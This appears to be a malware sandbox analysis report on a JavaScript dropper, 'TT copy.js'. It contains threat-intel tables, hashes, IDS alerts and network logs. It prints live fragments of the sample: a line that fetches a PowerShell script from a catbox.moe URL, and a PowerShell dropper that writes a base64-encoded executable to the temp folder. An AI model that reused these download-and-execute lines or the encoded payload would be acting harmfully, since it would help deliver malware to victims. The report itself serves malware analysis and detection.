                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    108.181.20.35Document.pdf.lnkGet hashmaliciousUnknownBrowse
                                                    • files.catbox.moe/p1yr9i.pdf
                                                    SecuriteInfo.com.HEUR.Trojan.OLE2.Agent.gen.26943.12401.msiGet hashmaliciousLummaC StealerBrowse
                                                    • files.catbox.moe/nzct1p
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    files.catbox.moez68scancopy.vbsGet hashmaliciousFormBookBrowse
                                                    • 108.181.20.35
                                                    2zirzlMVqX.batGet hashmaliciousXmrigBrowse
                                                    • 108.181.20.35
                                                    QwLii5vouB.exeGet hashmaliciousUnknownBrowse
                                                    • 108.181.20.35
                                                    PO Huaruicarbon 98718.htmlGet hashmaliciousCorporateDataTheft, HTMLPhisherBrowse
                                                    • 108.181.20.35
                                                    5QnwxSJVyX.docGet hashmaliciousUnknownBrowse
                                                    • 108.181.20.35
                                                    file.exeGet hashmaliciousFormBookBrowse
                                                    • 108.181.20.35
                                                    file.exeGet hashmaliciousFormBookBrowse
                                                    • 108.181.20.35
                                                    https://drive.google.com/uc?export=download&id=11w_oRLtDWJl2z1SKN0zkobTHd_Ix44t9Get hashmaliciousUnknownBrowse
                                                    • 108.181.20.35
                                                    LETA_pdf.vbsGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                    • 108.181.20.35
                                                    file.exeGet hashmaliciousFormBookBrowse
                                                    • 108.181.20.35
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    ASN852CAalyemenione.lnkGet hashmaliciousHavoc, QuasarBrowse
                                                    • 108.181.61.49
                                                    mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 204.191.146.80
                                                    la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                    • 161.184.58.16
                                                    la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                    • 199.175.174.49
                                                    powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 207.6.190.148
                                                    la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                    • 173.182.147.38
                                                    arm5.nn-20241218-1651.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 172.218.204.155
                                                    z68scancopy.vbsGet hashmaliciousFormBookBrowse
                                                    • 108.181.20.35
                                                    loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                    • 207.34.214.194
                                                    loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                    • 142.101.249.54
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYSBrowse
                                                    • 108.181.20.35
                                                    Rapporteer inbreuk op auteursrechten.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                    • 108.181.20.35
                                                    File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                    • 108.181.20.35
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                    • 108.181.20.35
                                                    alyemenione.lnkGet hashmaliciousHavoc, QuasarBrowse
                                                    • 108.181.20.35
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                    • 108.181.20.35
                                                    Payment_Failure_Notice_Office365_sdf_[13019].htmlGet hashmaliciousHTMLPhisherBrowse
                                                    • 108.181.20.35
                                                    R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                    • 108.181.20.35
                                                    List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                    • 108.181.20.35
                                                    g8ix97hz.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                    • 108.181.20.35
                                                    37f463bf4616ecd445d4a1937da06e19TUp6f2knn2.exeGet hashmaliciousLummaCBrowse
                                                    • 108.181.20.35
                                                    QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                    • 108.181.20.35
                                                    R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                    • 108.181.20.35
                                                    R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                    • 108.181.20.35
                                                    s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                    • 108.181.20.35
                                                    sqJIHyPqhr.exeGet hashmaliciousLummaCBrowse
                                                    • 108.181.20.35
                                                    solara-executor.exeGet hashmaliciousUnknownBrowse
                                                    • 108.181.20.35
                                                    List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                    • 108.181.20.35
                                                    g8ix97hz.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                    • 108.181.20.35
                                                    solara-executor.exeGet hashmaliciousUnknownBrowse
                                                    • 108.181.20.35
                                                    No context
                                                    Process:C:\Windows\System32\wscript.exe
                                                    File Type:ASCII text, with very long lines (14396), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):14456
                                                    Entropy (8bit):4.634199447337688
                                                    Encrypted:false
                                                    SSDEEP:384:DFBJ8AV7nf9pZRbd7r32YLSq6AuzdQqWXGeS1WrA:RB9bd7rmYLSqKzdNeOWrA
                                                    MD5:392DF965799760669862A1B77A8082A1
                                                    SHA1:BFE92C51305517B11131E57055D3D6925642CD50
                                                    SHA-256:F91B5AA1ACA053633FA2CEA131A71D337C952BCBDE82003975C8015EEC1CEBDD
                                                    SHA-512:4D0129043581BB98BF266FF62D5D33D44020C7821317646B55050869658E8BA629BCD2758C256DD167017C246BCD0C2398A337DD2D400D2B135C703406C6EE43
                                                    Malicious:true
                                                    Reputation:low
                                                    Preview:$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAQjhdcAAAAAAAAAAOAALgELAQYAACAAAAAIAAAAAAAADj8AAAAgAAAAQAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAMA+AABLAAAAAEAAAJgFAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAB4PgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAFB8AAAAgAAAAIAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAJgFAAAAQAAAAAYAAAAiAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAKAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADwPgAAAAAAAEgAAAACAAUAUCkAAHAUAAADAAIAEAAABsA9AAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEYrAiYWKwImFgIoBQAABgAAKgAAEzADANYAAAABAAARKwImFiAAAAAAOGcAAAAHgAEAAAQgBQAAADhXAAAAAH4BAAAEFP4BCigGAAAGKAcAAAY6a
                                                    Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):944
                                                    Entropy (8bit):5.351116490279513
                                                    Encrypted:false
                                                    SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4Kzer84j:MxHKlYHKh3oPtHo6hAHKzervj
                                                    MD5:A4AD9642B1D9E75F65BCFF0E383D274F
                                                    SHA1:6FFB77BAB80023486A6B72A108E8B1280104649E
                                                    SHA-256:E96412EECCA9FB8FAC8C09170223DAD3F52A98A52EECF462BC4F3E2720251027
                                                    SHA-512:743302453D5AF5301B9AD953E111EBED2F61AB0CF2159CEEF80279A48377F08C276CE5B33CBE1441667C72B42440B9B03FC3DDA1B9A274B977876978CC39FB92
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                    Process:C:\Windows\System32\wscript.exe
                                                    File Type:ASCII text, with very long lines (14396), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):14456
                                                    Entropy (8bit):4.634199447337688
                                                    Encrypted:false
                                                    SSDEEP:384:DFBJ8AV7nf9pZRbd7r32YLSq6AuzdQqWXGeS1WrA:RB9bd7rmYLSqKzdNeOWrA
                                                    MD5:392DF965799760669862A1B77A8082A1
                                                    SHA1:BFE92C51305517B11131E57055D3D6925642CD50
                                                    SHA-256:F91B5AA1ACA053633FA2CEA131A71D337C952BCBDE82003975C8015EEC1CEBDD
                                                    SHA-512:4D0129043581BB98BF266FF62D5D33D44020C7821317646B55050869658E8BA629BCD2758C256DD167017C246BCD0C2398A337DD2D400D2B135C703406C6EE43
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAQjhdcAAAAAAAAAAOAALgELAQYAACAAAAAIAAAAAAAADj8AAAAgAAAAQAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAMA+AABLAAAAAEAAAJgFAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAB4PgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAFB8AAAAgAAAAIAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAJgFAAAAQAAAAAYAAAAiAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAKAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADwPgAAAAAAAEgAAAACAAUAUCkAAHAUAAADAAIAEAAABsA9AAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEYrAiYWKwImFgIoBQAABgAAKgAAEzADANYAAAABAAARKwImFiAAAAAAOGcAAAAHgAEAAAQgBQAAADhXAAAAAH4BAAAEFP4BCigGAAAGKAcAAAY6a
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):1.1940658735648508
                                                    Encrypted:false
                                                    SSDEEP:3:NlllulJnp/p:NllU
                                                    MD5:BC6DB77EB243BF62DC31267706650173
                                                    SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                    SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                    SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:@...e.................................X..............@..........
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):10752
                                                    Entropy (8bit):5.086020476087015
                                                    Encrypted:false
                                                    SSDEEP:192:uYD1w0RZsWzLQR0zScCcRnh6fsVNgJSBsAZ:ND1lWALQsSl4h6fagOsA
                                                    MD5:DF1F48D5D5C174AA6AB5910BB41064FB
                                                    SHA1:653B29D4C76B935853D87AC6549B264E66D2127E
                                                    SHA-256:86BAD2C3F962EC96995C26FFA50B93564C40BA23FED010078B740B8F8823CD83
                                                    SHA-512:92335CDC575ECEEA32E38F8DCAE7CAF305B7DF69157505CEB6D927C41428452E097EF6AE413662ADB8908DC4EB6A67175F3C0DBEE04BB559EA1DA97B05D80A27
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....#................... ...........?... ...@....@.. ....................................`..................................>..K....@.......................`......x>............................................... ............... ..H............text........ ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B.................>......H.......P)..p............=..............................................F+.&.+.&..(......*...0..........+.&. ....8g......... ....8W....~........(....(....:h...& ....(....:....&.r...p.....(....o....s.....82... ............E............t...........".......5...8o...& ....8.....9.... .....9....&.~..... .....:....&8.....*...0..........+.&..~.....8.....*..2+.&........*...:+.&.....(....*..+.&..*..+.&..*.>+.&......(....*.0..........+.&..~.....8.....*..B+.&.+.&..(.....*...v+.&.+.&.s..
                                                    File type:ASCII text, with CRLF line terminators
                                                    Entropy (8bit):4.978953383350334
                                                    TrID:
                                                    • Digital Micrograph Script (4001/1) 100.00%
                                                    File name:TT copy.js
                                                    File size:2'028 bytes
                                                    MD5:24b70c6f9b34265023f8b4e9ceb4ae2e
                                                    SHA1:94e435325199616348f67aa17f0209b90d4d6b18
                                                    SHA256:6f1bdd6bc9a18a5ac6d7c28323e18f8aae4c5db0a5b54cc72df547518e7386c8
                                                    SHA512:bb120bc79aecda57dcb774e353cbbbdb316af756040074e68bd9df619aadb2b47f717de53fc76856b5f6857ea9afc138eac2503509ef41e19c0db059cc3c4475
                                                    SSDEEP:48:Rui8qYFJ6E3VwYJWgZdr6b0qu1/tcKVtvDb8r7:Rui8BzYgZx64Xwn
                                                    TLSH:1141DD5D9C1AD3211937970E831FD148EE91816B5A10C221B99CCA46BF345ACCEB4BDF
                                                    File Content Preview:// Constants to avoid magic strings..var URL = "https://files.catbox.moe/ugok5m.ps1";..var DownloadPath = "C:\\Temp\\dddddd.ps1";..var TEMP_DIR = "C:\\Temp";..var SUCCESS_STATUS = 200;....// Secure PowerShell execution policy and command..var POWERSHELL_C
                                                    Icon Hash:68d69b8bb6aa9a86
                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-12-19T07:50:05.500940+01002827578ETPRO MALWARE Likely Dropper Doc GET to .moe TLD1192.168.2.449730108.181.20.35443TCP
                                                    2024-12-19T07:50:05.501534+01002018856ET MALWARE Windows executable base64 encoded1108.181.20.35443192.168.2.449730TCP
                                                    2024-12-19T07:50:13.921848+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449732108.181.20.35443TCP
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 19, 2024 07:50:03.203561068 CET49730443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:03.203607082 CET44349730108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:03.203794003 CET49730443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:03.214648008 CET49730443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:03.214729071 CET44349730108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:04.964451075 CET44349730108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:04.964607000 CET49730443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:05.077966928 CET49730443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:05.078052044 CET44349730108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:05.079019070 CET44349730108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:05.079097986 CET49730443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:05.081320047 CET49730443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:05.123361111 CET44349730108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:05.500992060 CET44349730108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:05.501060963 CET44349730108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:05.501122952 CET44349730108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:05.501123905 CET49730443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:05.501197100 CET44349730108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:05.501247883 CET44349730108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:05.501261950 CET49730443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:05.501262903 CET49730443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:05.501262903 CET49730443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:05.501307011 CET49730443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:05.509473085 CET49730443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:05.509519100 CET44349730108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:08.159341097 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:08.159383059 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:08.159468889 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:08.167692900 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:08.167710066 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:09.915307999 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:09.915385962 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:09.917479038 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:09.917495966 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:09.917980909 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:09.967036963 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:10.030713081 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:10.075328112 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:10.644722939 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:10.644750118 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:10.644757032 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:10.644767046 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:10.644809008 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:10.644826889 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:10.644881964 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:10.644938946 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:10.690639973 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:10.690663099 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:10.690748930 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:10.690762997 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:10.690886021 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:10.837387085 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:10.837405920 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:10.837485075 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:10.837501049 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:10.837717056 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:10.879992008 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:10.880007982 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:10.880112886 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:10.880122900 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:10.880171061 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:10.909105062 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:10.909118891 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:10.909197092 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:10.909204960 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:10.909301043 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:10.933444023 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:10.933459997 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:10.933545113 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:10.933552980 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:10.933626890 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.038304090 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.038322926 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.038470984 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.038482904 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.038688898 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.062561035 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.062576056 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.062650919 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.062660933 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.062679052 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.062764883 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.083400965 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.083420038 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.083508015 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.083508015 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.083523989 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.083619118 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.097712994 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.097729921 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.097826004 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.097832918 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.097889900 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.110466957 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.110482931 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.110567093 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.110567093 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.110575914 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.110877037 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.122284889 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.122299910 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.122386932 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.122386932 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.122395039 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.122447968 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.231445074 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.231465101 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.231522083 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.231532097 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.231571913 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.231571913 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.243977070 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.243993998 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.244076967 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.244083881 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.244129896 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.256645918 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.256663084 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.256773949 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.256783009 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.256860018 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.267621994 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.267637014 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.267728090 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.267736912 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.267863989 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.279330015 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.279344082 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.279421091 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.279428005 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.279489994 CET49731443192.168.2.4108.181.20.35
                                                    Dec 19, 2024 07:50:11.292073965 CET44349731108.181.20.35192.168.2.4
                                                    Dec 19, 2024 07:50:11.292088985 CET44349731108.181.20.35192.168.2.4
